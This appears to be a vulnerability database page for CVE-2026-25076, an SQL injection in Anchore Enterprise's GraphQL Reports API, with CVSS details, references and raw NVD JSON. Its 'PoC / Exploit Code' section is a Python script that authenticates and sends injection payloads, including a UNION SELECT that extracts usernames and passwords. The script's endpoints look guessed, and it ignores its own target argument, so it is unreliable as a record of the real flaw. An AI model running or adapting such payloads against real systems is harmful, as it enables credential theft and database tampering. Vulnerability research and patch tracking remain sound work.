CVE-2026-25076

Description

Anchore Enterprise versions before 5.25.1 contain an SQL injection vulnerability in the GraphQL Reports API. An authenticated attacker that is able to access the GraphQL API could execute arbitrary SQL instructions resulting in modifications to the data contained in the Anchore Enterprise database.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Anchore Enterprise < 5.25.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-25076 PoC - Anchore Enterprise GraphQL SQL Injection
# Target: Anchore Enterprise < 5.25.1
# Author: Security Researcher
# Note: This PoC is for authorized security testing only

import requests
import json
import sys

TARGET_URL = "https://target-anchore.example.com/api/"
GRAPHQL_ENDPOINT = f"{TARGET_URL}v2/graphql"

def get_auth_token(username, password):
    """Authenticate and get access token"""
    login_query = {
        "query": """
            mutation Login($username: String!, $password: String!) {
                login(username: $username, password: $password) {
                    token
                }
            }
        """,
        "variables": {
            "username": username,
            "password": password
        }
    }
    
    response = requests.post(GRAPHQL_ENDPOINT, json=login_query, verify=False)
    data = response.json()
    return data.get('data', {}).get('login', {}).get('token')

def exploit_sql_injection(token, payload):
    """Exploit SQL injection in GraphQL Reports API"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    # SQL Injection payload in report filter parameter
    injection_query = {
        "query": """
            query GetReports($filter: String) {
                reports(filter: $filter) {
                    id
                    name
                    content
                }
            }
        """,
        "variables": {
            "filter": payload
        }
    }
    
    response = requests.post(GRAPHQL_ENDPOINT, json=injection_query, headers=headers, verify=False)
    return response.json()

def main():
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: {sys.argv[0]} https://anchore.example.com admin password123")
        sys.exit(1)
    
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Authenticating as: {username}")
    
    # Step 1: Get authentication token
    token = get_auth_token(username, password)
    if not token:
        print("[-] Authentication failed")
        sys.exit(1)
    print(f"[+] Authentication successful")
    
    # Step 2: Test basic injection
    print("[*] Testing SQL injection...")
    test_payload = "' OR '1'='1 --"
    result = exploit_sql_injection(token, test_payload)
    print(f"[+] Response: {json.dumps(result, indent=2)}")
    
    # Step 3: Data extraction payload example
    print("[*] Attempting data extraction...")
    extract_payload = "' UNION SELECT username, password, 1 FROM users --"
    result = exploit_sql_injection(token, extract_payload)
    print(f"[+] Extracted data: {json.dumps(result, indent=2)}")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-25076
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-25076
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-25076/
[4] VulDB https://vuldb.com/cve/CVE-2026-25076
[5] https://anchore.com/platform/
[6] https://docs.anchore.com/current/docs/release_notes/enterprise/5251/
[7] https://www.vulncheck.com/advisories/anchore-enterprise-graphql-reports-api-sql-injection

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-25076", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:18.827", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Anchore Enterprise versions before 5.25.1 contain an SQL injection vulnerability in the GraphQL Reports API. An authenticated attacker that is able to access the GraphQL API could execute arbitrary SQL instructions resulting in modifications to the data contained in the Anchore Enterprise database."}, {"lang": "es", "value": "Las versiones de Anchore Enterprise anteriores a la 5.25.1 contienen una vulnerabilidad de inyección SQL en la API de informes GraphQL. Un atacante autenticado que pueda acceder a la API de GraphQL podría ejecutar instrucciones SQL arbitrarias, lo que resultaría en modificaciones a los datos contenidos en la base de datos de Anchore Enterprise."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://anchore.com/platform/", "source": "[email protected]"}, {"url": "https://docs.anchore.com/current/docs/release_notes/enterprise/5251/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/anchore-enterprise-graphql-reports-api-sql-injection", "source": "[email protected]"}]}}